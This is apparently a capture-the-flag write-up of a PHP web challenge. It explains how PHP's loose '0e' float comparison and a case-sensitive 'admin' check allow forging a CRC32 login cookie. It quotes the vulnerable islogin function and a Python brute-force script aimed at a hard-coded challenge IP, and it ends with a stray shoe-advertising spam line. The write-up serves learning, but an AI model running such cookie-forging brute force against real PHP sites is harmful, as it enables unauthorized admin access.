The sense of this task is to login with user which idx=1. But we don't know, who has this idx
The algoritm for cookie is CRCR32 and this is strange. Because this hash purpose is not for crypto, it's for checksums. But for first try code of server look's good enough. REALY THANK TO ORGS, BECAUSE CODE IS GREAT AND SIMPLE, SO IT'S REALY EASY TO UNDERSTAND THE LOGIC OF SERVER
After reading some manuals we decided that the vuln is in hash. And found post about comparison issues in php whith float string
Php is not strongly typed, and that's why there is some magic with comprassions, and one of them is casting both string to float if they look like float. For example:
if ("0e12" == "0") echo 1; else echo 2;
This code prints 1!!!! This is magic two different string are equal))
So we decided to brute cookie. We were always sending hash = "0" and different timestamp
Some calculation, we need first symbol to be "0", second "e", and all other is digits. So the probability is 1/16 * 1/16 * (10/16)**6. this is equal to 1/4300, that is not much for online brute
First part was done, we could logged-in with id we want. But what id we need?
After reading code we found this strange
public function islogin(){ if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){ exit("cannot be used Special character"); } if( $_COOKIE['user_name'] == "admin" ) return 0; $salt = file_get_contents("../../long_salt.txt"); if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){ return 1; } return 0; }
The 6th string seems to be strange, why id admin is restricred. This is easy to bypass. We just need to login with name in uppercase, because php use case sensetive cmp, but sql not.
So the brute scipt is:
import requests u1 = "http://219.240.37.153:5959/63972dfdacc8a838f618275d80d27c1d_h/index.php" for i in xrange(0, 10000000): print i cookies = { "login_time": str(i), "user_name": "ADMIN", "hash": "0" } try: r = requests.get(u1, cookies=cookies).content except: continue if '' not in r: print r exit(0)buy footwear | Women's Nike Air Jordan 1 trainers - Latest Releases , Ietp